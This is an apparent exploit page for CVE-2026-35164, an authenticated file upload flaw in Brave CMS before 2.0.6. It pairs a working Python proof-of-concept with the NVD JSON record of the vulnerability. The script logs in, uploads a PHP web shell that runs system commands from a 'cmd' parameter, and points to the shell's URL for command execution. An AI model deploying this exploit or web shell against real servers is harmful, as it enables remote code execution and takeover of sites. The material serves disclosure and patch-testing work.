CVE-2026-35164

import requests # Target configuration target_url = "http://target.com/dashboard/ckupload" # Vulnerable endpoint shell_name = "exploit.php" # Attacker's credentials (required as PR:L) username = "attacker" password = "password" login_url = "http://target.com/login" # PHP payload to execute system commands php_payload = "<?php system($_GET['cmd']); ?>" def exploit(): session = requests.Session() # Step 1: Authenticate to the application print(f"[*] Logging in as {username}...") login_data = { "username": username, "password": password } # Adjust login POST data based on actual form fields session.post(login_url, data=login_data) # Step 2: Upload the malicious file print(f"[*] Uploading {shell_name}...") files = { 'upload': (shell_name, php_payload, 'application/octet-stream') } # The parameter name 'upload' might vary, check the form data response = session.post(target_url, files=files) if response.status_code == 200: print("[+] Upload successful!") print(f"[+] Access your shell at: http://target.com/uploads/{shell_name}?cmd=whoami") else: print("[-] Upload failed.") print(response.text) if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-35164", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:42.900", "lastModified": "2026-04-14T15:51:15.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to 2.0.6, an unrestricted file upload vulnerability exists in the CKEditor upload functionality. It is found in app/Http/Controllers/Dashboard/CkEditorController.php within the ckupload method. The method fails to validate uploaded file types and relies entirely on user input. This allows an authenticated user to upload executable PHP scripts and gain Remote Code Execution. This vulnerability is fixed in 2.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ajax30:bravecms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.6", "matchCriteriaId": "68058898-316C-481E-A190-0E50C51A015D"}]}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-2j4q-6p52-4rhw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-2j4q-6p52-4rhw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}